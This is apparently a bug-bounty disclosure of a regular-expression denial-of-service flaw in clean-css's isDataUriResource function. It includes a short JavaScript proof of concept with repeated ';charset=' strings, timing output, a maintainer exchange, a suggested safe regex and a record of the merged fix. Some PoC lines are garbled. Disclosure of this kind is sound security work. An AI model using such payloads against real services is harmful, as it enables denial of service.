Inefficient Regular Expression Complexity in clean-css/clean-css


Reported on

Sep 12th 2021

✍️ Description

It allows cause a denial of service when calling function isDataUriResource.

🕵️‍♂️ Proof of Concept

// PoC.js
var isDataUriResource = require("clean-css/lib/utils/is-data-uri-resource")

for(var i = 1; i <= 50000; i++) {
   var time =;
   var attack_str = 'data:' + ';charset=a;'.repeat(i*10000);
   var time_cost = - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")

💥 The Output

attack_str.length: 110005: 4326 ms
attack_str.length: 220005: 17106 ms
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the clean-css team and are waiting to hear back a year ago
clean-css/clean-css maintainer
a year ago


Hey folks / @admin - this is clean-css maintainer. I appreciate the security you disclosed, however I want you to comment on few things:

  • clean-css is a quite popular library however in 99.9% percent of cases it's used during a build process, so DoS at that point would result in a longer build process and/or build crash
  • I believe those 0.1% cases affected is when someone provides CSS optimization as a service (we do but it's still done 100% inside a browser) and this may cause DoS and allow someone to escalate privileges etc

Sure we can do a fix, but there's probably countless other cases where this can happen.

Yeting Li
a year ago


Hi​, nice to hear from you. If the CSS optimization is regarded as a service, it is indeed vulnerable to DOS attacks. I am willing to suggest that the maintainers replace the vulnerable regex /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/ with the safe regex /^data:(\S*?)?(;charset=(?:(?!;charset=)[^;])+)?(;[^,]+?)?,(.+)/.

clean-css/clean-css maintainer validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
clean-css/clean-css maintainer confirmed that a fix has been merged on 3721c6 a year ago
The fix bounty has been dropped
is-data-uri-resource.js#L1 has been validated
to join this conversation